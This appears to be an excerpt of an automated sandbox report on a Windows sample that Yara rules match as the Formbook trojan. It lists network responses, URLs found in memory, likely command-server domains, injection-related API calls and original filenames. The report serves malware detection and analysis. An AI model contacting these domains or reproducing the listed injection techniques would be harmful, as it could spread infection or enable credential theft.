            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:37 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:40 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:43 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:45 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004564000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000002F04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2361594319.000000001C224000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: Scan 00093847.exe, 00000000.00000002.1836424368.000000000307A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Scan 00093847.exe, 00000000.00000002.1844023650.0000000005900000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3555734438.0000000004FFB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mbwd.store
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3555734438.0000000004FFB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mbwd.store/pn1r/
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Scan 00093847.exe, 00000000.00000002.1844565242.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004D3E000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.00000000036DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000009.00000003.2247955546.0000000008639000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/whois
            Source: setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domeneshop.no/whois
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.000000000354C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0ei

            E-Banking Fraud

            Source: Yara match, File source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_0042C593 NtClose,3_2_0042C593
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C35C0 NtCreateMutant,LdrInitializeThunk,3_2_010C35C0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2B60 NtClose,LdrInitializeThunk,3_2_010C2B60
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_010C2DF0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010C2C70
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C3010 NtOpenDirectoryObject,3_2_010C3010
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C3090 NtSetValueKey,3_2_010C3090
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C4340 NtSetContextThread,3_2_010C4340
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C4650 NtSuspendThread,3_2_010C4650
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C39B0 NtGetContextThread,3_2_010C39B0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2B80 NtQueryInformationFile,3_2_010C2B80
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2BA0 NtEnumerateValueKey,3_2_010C2BA0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2BE0 NtQueryValueKey,3_2_010C2BE0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2BF0 NtAllocateVirtualMemory,3_2_010C2BF0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2AB0 NtWaitForSingleObject,3_2_010C2AB0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2AD0 NtReadFile,3_2_010C2AD0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2AF0 NtWriteFile,3_2_010C2AF0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2D00 NtSetInformationFile,3_2_010C2D00
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C3D10 NtOpenProcessToken,3_2_010C3D10
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2D10 NtMapViewOfSection,3_2_010C2D10
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2D30 NtUnmapViewOfSection,3_2_010C2D30
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C3D70 NtOpenThread,3_2_010C3D70
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2DB0 NtEnumerateKey,3_2_010C2DB0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2DD0 NtDelayExecution,3_2_010C2DD0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2C00 NtQueryInformationProcess,3_2_010C2C00
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2C60 NtCreateKey,3_2_010C2C60
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2CA0 NtQueryInformationToken,3_2_010C2CA0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2CC0 NtQueryVirtualMemory,3_2_010C2CC0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2CF0 NtOpenProcess,3_2_010C2CF0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2F30 NtCreateSection,3_2_010C2F30
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2F60 NtCreateProcessEx,3_2_010C2F60
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2F90 NtProtectVirtualMemory,3_2_010C2F90
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2FA0 NtQuerySection,3_2_010C2FA0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2FB0 NtResumeThread,3_2_010C2FB0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2FE0 NtCreateFile,3_2_010C2FE0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2E30 NtWriteVirtualMemory,3_2_010C2E30
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2E80 NtReadVirtualMemory,3_2_010C2E80
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2EA0 NtAdjustPrivilegesToken,3_2_010C2EA0
            Source: C:\Users\user\Desktop\Scan 00093847.exe Code function: 3_2_010C2EE0 NtQueueApcThread,3_2_010C2EE0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC4340 NtSetContextThread,LdrInitializeThunk,9_2_03BC4340
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC4650 NtSuspendThread,LdrInitializeThunk,9_2_03BC4650
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03BC2BA0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03BC2BF0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03BC2BE0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2B60 NtClose,LdrInitializeThunk,9_2_03BC2B60
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2AF0 NtWriteFile,LdrInitializeThunk,9_2_03BC2AF0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2AD0 NtReadFile,LdrInitializeThunk,9_2_03BC2AD0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2FB0 NtResumeThread,LdrInitializeThunk,9_2_03BC2FB0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2FE0 NtCreateFile,LdrInitializeThunk,9_2_03BC2FE0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2F30 NtCreateSection,LdrInitializeThunk,9_2_03BC2F30
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03BC2E80
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03BC2EE0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03BC2DF0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2DD0 NtDelayExecution,LdrInitializeThunk,9_2_03BC2DD0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03BC2D30
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03BC2D10
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03BC2CA0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03BC2C70
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2C60 NtCreateKey,LdrInitializeThunk,9_2_03BC2C60
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC35C0 NtCreateMutant,LdrInitializeThunk,9_2_03BC35C0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC39B0 NtGetContextThread,LdrInitializeThunk,9_2_03BC39B0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2B80 NtQueryInformationFile,9_2_03BC2B80
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2AB0 NtWaitForSingleObject,9_2_03BC2AB0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2FA0 NtQuerySection,9_2_03BC2FA0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2F90 NtProtectVirtualMemory,9_2_03BC2F90
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2F60 NtCreateProcessEx,9_2_03BC2F60
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2EA0 NtAdjustPrivilegesToken,9_2_03BC2EA0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2E30 NtWriteVirtualMemory,9_2_03BC2E30
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2DB0 NtEnumerateKey,9_2_03BC2DB0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2D00 NtSetInformationFile,9_2_03BC2D00
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2CF0 NtOpenProcess,9_2_03BC2CF0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2CC0 NtQueryVirtualMemory,9_2_03BC2CC0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC2C00 NtQueryInformationProcess,9_2_03BC2C00
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC3090 NtSetValueKey,9_2_03BC3090
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC3010 NtOpenDirectoryObject,9_2_03BC3010
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC3D10 NtOpenProcessToken,9_2_03BC3D10
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03BC3D70 NtOpenThread,9_2_03BC3D70
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03279230 NtDeleteFile,9_2_03279230
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_032792D0 NtClose,9_2_032792D0
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03279140 NtReadFile,9_2_03279140
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03279430 NtAllocateVirtualMemory,9_2_03279430
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 9_2_03278FD0 NtCreateFile,9_2_03278FD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C47A469_2_03C47A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FA499_2_03C4FA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C03A6C9_2_03C03A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C259109_2_03C25910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B999509_2_03B99950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAB9509_2_03BAB950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B938E09_2_03B938E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BFD8009_2_03BFD800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B91F929_2_03B91F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FFB19_2_03C4FFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FF099_2_03C4FF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B99EB09_2_03B99EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAFDC09_2_03BAFDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C41D5A9_2_03C41D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C47D739_2_03C47D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B93D409_2_03B93D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FCF29_2_03C4FCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C09C329_2_03C09C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03261C409_2_03261C40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032652D09_2_032652D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032634BB9_2_032634BB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032634C09_2_032634C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CB789_2_0325CB78
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CB809_2_0325CB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0327B8D09_2_0327B8D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325AE209_2_0325AE20
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CDA09_2_0325CDA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E5639_2_0397E563
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E4489_2_0397E448
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397D9689_2_0397D968
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E8FC9_2_0397E8FC
            Source: C:\Windows\SysWOW64\setupugc.exe, Code function: String function: 03BC5130 appears 57 times
            Source: C:\Windows\SysWOW64\setupugc.exe, Code function: String function: 03B7B970 appears 257 times
            Source: C:\Windows\SysWOW64\setupugc.exe, Code function: String function: 03BFEA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exe, Code function: String function: 03C0F290 appears 103 times
            Source: C:\Windows\SysWOW64\setupugc.exe, Code function: String function: 03BD7E54 appears 98 times
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Code function: String function: 0110F290 appears 103 times
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Code function: String function: 010C5130 appears 36 times
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Code function: String function: 010FEA12 appears 86 times
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Code function: String function: 0107B970 appears 250 times
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Code function: String function: 010D7E54 appears 88 times
            Source: Scan 00093847.exe, 00000000.00000000.1678731871.0000000000B86000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameWYNp.exe< vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1835046384.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1845997380.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1846818865.0000000007F70000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan 00093847.exe
